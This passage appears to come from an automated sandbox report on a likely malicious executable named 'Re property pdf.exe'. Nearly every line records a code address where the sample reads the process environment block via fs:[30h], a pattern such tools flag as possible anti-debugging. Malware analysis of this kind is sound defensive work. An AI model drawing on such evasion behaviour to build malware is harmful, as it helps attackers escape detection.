            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A2000 mov eax, dword ptr fs:[00000030h]6_2_010A2000
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A2000 mov eax, dword ptr fs:[00000030h]6_2_010A2000
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A2000 mov eax, dword ptr fs:[00000030h]6_2_010A2000
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A2000 mov eax, dword ptr fs:[00000030h]6_2_010A2000
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101E016 mov eax, dword ptr fs:[00000030h]6_2_0101E016
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101E016 mov eax, dword ptr fs:[00000030h]6_2_0101E016
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101E016 mov eax, dword ptr fs:[00000030h]6_2_0101E016
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101E016 mov eax, dword ptr fs:[00000030h]6_2_0101E016
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01096030 mov eax, dword ptr fs:[00000030h]6_2_01096030
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01002050 mov eax, dword ptr fs:[00000030h]6_2_01002050
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01086050 mov eax, dword ptr fs:[00000030h]6_2_01086050
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFA197 mov eax, dword ptr fs:[00000030h]6_2_00FFA197
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFA197 mov eax, dword ptr fs:[00000030h]6_2_00FFA197
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFA197 mov eax, dword ptr fs:[00000030h]6_2_00FFA197
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102C073 mov eax, dword ptr fs:[00000030h]6_2_0102C073
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100208A mov eax, dword ptr fs:[00000030h]6_2_0100208A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010980A8 mov eax, dword ptr fs:[00000030h]6_2_010980A8
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFC156 mov eax, dword ptr fs:[00000030h]6_2_00FFC156
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C60B8 mov eax, dword ptr fs:[00000030h]6_2_010C60B8
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010C60B8 mov ecx, dword ptr fs:[00000030h]6_2_010C60B8
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010820DE mov eax, dword ptr fs:[00000030h]6_2_010820DE
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010860E0 mov eax, dword ptr fs:[00000030h]6_2_010860E0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010080E9 mov eax, dword ptr fs:[00000030h]6_2_010080E9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010420F0 mov ecx, dword ptr fs:[00000030h]6_2_010420F0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103A30B mov eax, dword ptr fs:[00000030h]6_2_0103A30B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103A30B mov eax, dword ptr fs:[00000030h]6_2_0103A30B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103A30B mov eax, dword ptr fs:[00000030h]6_2_0103A30B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01020310 mov ecx, dword ptr fs:[00000030h]6_2_01020310
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D8324 mov eax, dword ptr fs:[00000030h]6_2_010D8324
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D8324 mov ecx, dword ptr fs:[00000030h]6_2_010D8324
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D8324 mov eax, dword ptr fs:[00000030h]6_2_010D8324
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D8324 mov eax, dword ptr fs:[00000030h]6_2_010D8324
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01082349 mov eax, dword ptr fs:[00000030h]6_2_01082349
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01082349 mov eax, dword ptr fs:[00000030h]6_2_01082349
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01082349 mov eax, dword ptr fs:[00000030h]6_2_01082349
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01082349 mov eax, dword ptr fs:[00000030h]6_2_01082349
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01082349 mov eax, dword ptr fs:[00000030h]6_2_01082349
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01082349 mov eax, dword ptr fs:[00000030h]6_2_01082349
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01082349 mov eax, dword ptr fs:[00000030h]6_2_01082349
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01082349 mov eax, dword ptr fs:[00000030h]6_2_01082349
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01082349 mov eax, dword ptr fs:[00000030h]6_2_01082349
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01082349 mov eax, dword ptr fs:[00000030h]6_2_01082349
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01082349 mov eax, dword ptr fs:[00000030h]6_2_01082349
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01082349 mov eax, dword ptr fs:[00000030h]6_2_01082349
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01082349 mov eax, dword ptr fs:[00000030h]6_2_01082349
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01082349 mov eax, dword ptr fs:[00000030h]6_2_01082349
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01082349 mov eax, dword ptr fs:[00000030h]6_2_01082349
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D634F mov eax, dword ptr fs:[00000030h]6_2_010D634F
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108035C mov eax, dword ptr fs:[00000030h]6_2_0108035C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108035C mov eax, dword ptr fs:[00000030h]6_2_0108035C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108035C mov eax, dword ptr fs:[00000030h]6_2_0108035C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108035C mov ecx, dword ptr fs:[00000030h]6_2_0108035C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108035C mov eax, dword ptr fs:[00000030h]6_2_0108035C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108035C mov eax, dword ptr fs:[00000030h]6_2_0108035C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A8350 mov ecx, dword ptr fs:[00000030h]6_2_010A8350
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010CA352 mov eax, dword ptr fs:[00000030h]6_2_010CA352
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A437C mov eax, dword ptr fs:[00000030h]6_2_010A437C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102438F mov eax, dword ptr fs:[00000030h]6_2_0102438F
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102438F mov eax, dword ptr fs:[00000030h]6_2_0102438F
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FF826B mov eax, dword ptr fs:[00000030h]6_2_00FF826B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFA250 mov eax, dword ptr fs:[00000030h]6_2_00FFA250
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A3C0 mov eax, dword ptr fs:[00000030h]6_2_0100A3C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A3C0 mov eax, dword ptr fs:[00000030h]6_2_0100A3C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A3C0 mov eax, dword ptr fs:[00000030h]6_2_0100A3C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A3C0 mov eax, dword ptr fs:[00000030h]6_2_0100A3C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A3C0 mov eax, dword ptr fs:[00000030h]6_2_0100A3C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A3C0 mov eax, dword ptr fs:[00000030h]6_2_0100A3C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010083C0 mov eax, dword ptr fs:[00000030h]6_2_010083C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010083C0 mov eax, dword ptr fs:[00000030h]6_2_010083C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010083C0 mov eax, dword ptr fs:[00000030h]6_2_010083C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010083C0 mov eax, dword ptr fs:[00000030h]6_2_010083C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FF823B mov eax, dword ptr fs:[00000030h]6_2_00FF823B
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010BC3CD mov eax, dword ptr fs:[00000030h]6_2_010BC3CD
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010863C0 mov eax, dword ptr fs:[00000030h]6_2_010863C0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AE3DB mov eax, dword ptr fs:[00000030h]6_2_010AE3DB
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AE3DB mov eax, dword ptr fs:[00000030h]6_2_010AE3DB
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AE3DB mov ecx, dword ptr fs:[00000030h]6_2_010AE3DB
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010AE3DB mov eax, dword ptr fs:[00000030h]6_2_010AE3DB
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A43D4 mov eax, dword ptr fs:[00000030h]6_2_010A43D4
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010A43D4 mov eax, dword ptr fs:[00000030h]6_2_010A43D4
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010103E9 mov eax, dword ptr fs:[00000030h]6_2_010103E9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010103E9 mov eax, dword ptr fs:[00000030h]6_2_010103E9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010103E9 mov eax, dword ptr fs:[00000030h]6_2_010103E9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010103E9 mov eax, dword ptr fs:[00000030h]6_2_010103E9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010103E9 mov eax, dword ptr fs:[00000030h]6_2_010103E9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010103E9 mov eax, dword ptr fs:[00000030h]6_2_010103E9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010103E9 mov eax, dword ptr fs:[00000030h]6_2_010103E9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010103E9 mov eax, dword ptr fs:[00000030h]6_2_010103E9
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101E3F0 mov eax, dword ptr fs:[00000030h]6_2_0101E3F0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101E3F0 mov eax, dword ptr fs:[00000030h]6_2_0101E3F0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0101E3F0 mov eax, dword ptr fs:[00000030h]6_2_0101E3F0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010363FF mov eax, dword ptr fs:[00000030h]6_2_010363FF
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01088243 mov eax, dword ptr fs:[00000030h]6_2_01088243
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01088243 mov ecx, dword ptr fs:[00000030h]6_2_01088243
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D625D mov eax, dword ptr fs:[00000030h]6_2_010D625D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01006259 mov eax, dword ptr fs:[00000030h]6_2_01006259
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010BA250 mov eax, dword ptr fs:[00000030h]6_2_010BA250
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010BA250 mov eax, dword ptr fs:[00000030h]6_2_010BA250
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01004260 mov eax, dword ptr fs:[00000030h]6_2_01004260
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01004260 mov eax, dword ptr fs:[00000030h]6_2_01004260
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01004260 mov eax, dword ptr fs:[00000030h]6_2_01004260
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FF8397 mov eax, dword ptr fs:[00000030h]6_2_00FF8397
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FF8397 mov eax, dword ptr fs:[00000030h]6_2_00FF8397
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FF8397 mov eax, dword ptr fs:[00000030h]6_2_00FF8397
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFE388 mov eax, dword ptr fs:[00000030h]6_2_00FFE388
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFE388 mov eax, dword ptr fs:[00000030h]6_2_00FFE388
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFE388 mov eax, dword ptr fs:[00000030h]6_2_00FFE388
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B0274 mov eax, dword ptr fs:[00000030h]6_2_010B0274
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B0274 mov eax, dword ptr fs:[00000030h]6_2_010B0274
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B0274 mov eax, dword ptr fs:[00000030h]6_2_010B0274
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B0274 mov eax, dword ptr fs:[00000030h]6_2_010B0274
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B0274 mov eax, dword ptr fs:[00000030h]6_2_010B0274
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B0274 mov eax, dword ptr fs:[00000030h]6_2_010B0274
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B0274 mov eax, dword ptr fs:[00000030h]6_2_010B0274
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B0274 mov eax, dword ptr fs:[00000030h]6_2_010B0274
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B0274 mov eax, dword ptr fs:[00000030h]6_2_010B0274
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B0274 mov eax, dword ptr fs:[00000030h]6_2_010B0274
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B0274 mov eax, dword ptr fs:[00000030h]6_2_010B0274
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010B0274 mov eax, dword ptr fs:[00000030h]6_2_010B0274
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E284 mov eax, dword ptr fs:[00000030h]6_2_0103E284
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E284 mov eax, dword ptr fs:[00000030h]6_2_0103E284
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01080283 mov eax, dword ptr fs:[00000030h]6_2_01080283
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01080283 mov eax, dword ptr fs:[00000030h]6_2_01080283
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01080283 mov eax, dword ptr fs:[00000030h]6_2_01080283
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010102A0 mov eax, dword ptr fs:[00000030h]6_2_010102A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010102A0 mov eax, dword ptr fs:[00000030h]6_2_010102A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010962A0 mov eax, dword ptr fs:[00000030h]6_2_010962A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010962A0 mov ecx, dword ptr fs:[00000030h]6_2_010962A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010962A0 mov eax, dword ptr fs:[00000030h]6_2_010962A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010962A0 mov eax, dword ptr fs:[00000030h]6_2_010962A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010962A0 mov eax, dword ptr fs:[00000030h]6_2_010962A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010962A0 mov eax, dword ptr fs:[00000030h]6_2_010962A0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A2C3 mov eax, dword ptr fs:[00000030h]6_2_0100A2C3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A2C3 mov eax, dword ptr fs:[00000030h]6_2_0100A2C3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A2C3 mov eax, dword ptr fs:[00000030h]6_2_0100A2C3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A2C3 mov eax, dword ptr fs:[00000030h]6_2_0100A2C3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100A2C3 mov eax, dword ptr fs:[00000030h]6_2_0100A2C3
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D62D6 mov eax, dword ptr fs:[00000030h]6_2_010D62D6
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010102E1 mov eax, dword ptr fs:[00000030h]6_2_010102E1
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010102E1 mov eax, dword ptr fs:[00000030h]6_2_010102E1
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010102E1 mov eax, dword ptr fs:[00000030h]6_2_010102E1
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFC310 mov ecx, dword ptr fs:[00000030h]6_2_00FFC310
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01096500 mov eax, dword ptr fs:[00000030h]6_2_01096500
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D4500 mov eax, dword ptr fs:[00000030h]6_2_010D4500
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D4500 mov eax, dword ptr fs:[00000030h]6_2_010D4500
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D4500 mov eax, dword ptr fs:[00000030h]6_2_010D4500
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D4500 mov eax, dword ptr fs:[00000030h]6_2_010D4500
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D4500 mov eax, dword ptr fs:[00000030h]6_2_010D4500
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D4500 mov eax, dword ptr fs:[00000030h]6_2_010D4500
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D4500 mov eax, dword ptr fs:[00000030h]6_2_010D4500
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010535 mov eax, dword ptr fs:[00000030h]6_2_01010535
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010535 mov eax, dword ptr fs:[00000030h]6_2_01010535
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010535 mov eax, dword ptr fs:[00000030h]6_2_01010535
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010535 mov eax, dword ptr fs:[00000030h]6_2_01010535
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010535 mov eax, dword ptr fs:[00000030h]6_2_01010535
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01010535 mov eax, dword ptr fs:[00000030h]6_2_01010535
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E53E mov eax, dword ptr fs:[00000030h]6_2_0102E53E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E53E mov eax, dword ptr fs:[00000030h]6_2_0102E53E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E53E mov eax, dword ptr fs:[00000030h]6_2_0102E53E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E53E mov eax, dword ptr fs:[00000030h]6_2_0102E53E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E53E mov eax, dword ptr fs:[00000030h]6_2_0102E53E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01008550 mov eax, dword ptr fs:[00000030h]6_2_01008550
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01008550 mov eax, dword ptr fs:[00000030h]6_2_01008550
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103656A mov eax, dword ptr fs:[00000030h]6_2_0103656A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103656A mov eax, dword ptr fs:[00000030h]6_2_0103656A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103656A mov eax, dword ptr fs:[00000030h]6_2_0103656A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01002582 mov eax, dword ptr fs:[00000030h]6_2_01002582
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01002582 mov ecx, dword ptr fs:[00000030h]6_2_01002582
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01034588 mov eax, dword ptr fs:[00000030h]6_2_01034588
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E59C mov eax, dword ptr fs:[00000030h]6_2_0103E59C
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FF645D mov eax, dword ptr fs:[00000030h]6_2_00FF645D
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010805A7 mov eax, dword ptr fs:[00000030h]6_2_010805A7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010805A7 mov eax, dword ptr fs:[00000030h]6_2_010805A7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010805A7 mov eax, dword ptr fs:[00000030h]6_2_010805A7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010245B1 mov eax, dword ptr fs:[00000030h]6_2_010245B1
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010245B1 mov eax, dword ptr fs:[00000030h]6_2_010245B1
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E5CF mov eax, dword ptr fs:[00000030h]6_2_0103E5CF
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E5CF mov eax, dword ptr fs:[00000030h]6_2_0103E5CF
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010065D0 mov eax, dword ptr fs:[00000030h]6_2_010065D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103A5D0 mov eax, dword ptr fs:[00000030h]6_2_0103A5D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103A5D0 mov eax, dword ptr fs:[00000030h]6_2_0103A5D0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFC427 mov eax, dword ptr fs:[00000030h]6_2_00FFC427
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFE420 mov eax, dword ptr fs:[00000030h]6_2_00FFE420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFE420 mov eax, dword ptr fs:[00000030h]6_2_00FFE420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFE420 mov eax, dword ptr fs:[00000030h]6_2_00FFE420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010025E0 mov eax, dword ptr fs:[00000030h]6_2_010025E0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E5E7 mov eax, dword ptr fs:[00000030h]6_2_0102E5E7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E5E7 mov eax, dword ptr fs:[00000030h]6_2_0102E5E7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E5E7 mov eax, dword ptr fs:[00000030h]6_2_0102E5E7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E5E7 mov eax, dword ptr fs:[00000030h]6_2_0102E5E7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E5E7 mov eax, dword ptr fs:[00000030h]6_2_0102E5E7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E5E7 mov eax, dword ptr fs:[00000030h]6_2_0102E5E7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E5E7 mov eax, dword ptr fs:[00000030h]6_2_0102E5E7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102E5E7 mov eax, dword ptr fs:[00000030h]6_2_0102E5E7
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103C5ED mov eax, dword ptr fs:[00000030h]6_2_0103C5ED
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103C5ED mov eax, dword ptr fs:[00000030h]6_2_0103C5ED
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01038402 mov eax, dword ptr fs:[00000030h]6_2_01038402
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01038402 mov eax, dword ptr fs:[00000030h]6_2_01038402
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01038402 mov eax, dword ptr fs:[00000030h]6_2_01038402
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01086420 mov eax, dword ptr fs:[00000030h]6_2_01086420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01086420 mov eax, dword ptr fs:[00000030h]6_2_01086420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01086420 mov eax, dword ptr fs:[00000030h]6_2_01086420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01086420 mov eax, dword ptr fs:[00000030h]6_2_01086420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01086420 mov eax, dword ptr fs:[00000030h]6_2_01086420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01086420 mov eax, dword ptr fs:[00000030h]6_2_01086420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01086420 mov eax, dword ptr fs:[00000030h]6_2_01086420
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E443 mov eax, dword ptr fs:[00000030h]6_2_0103E443
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E443 mov eax, dword ptr fs:[00000030h]6_2_0103E443
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E443 mov eax, dword ptr fs:[00000030h]6_2_0103E443
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E443 mov eax, dword ptr fs:[00000030h]6_2_0103E443
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E443 mov eax, dword ptr fs:[00000030h]6_2_0103E443
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E443 mov eax, dword ptr fs:[00000030h]6_2_0103E443
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E443 mov eax, dword ptr fs:[00000030h]6_2_0103E443
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0103E443 mov eax, dword ptr fs:[00000030h]6_2_0103E443
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102245A mov eax, dword ptr fs:[00000030h]6_2_0102245A
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010BA456 mov eax, dword ptr fs:[00000030h]6_2_010BA456
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0108C460 mov ecx, dword ptr fs:[00000030h]6_2_0108C460
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102A470 mov eax, dword ptr fs:[00000030h]6_2_0102A470
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0102A470 mov eax, dword ptr fs:[00000030h]6_2_0102A470
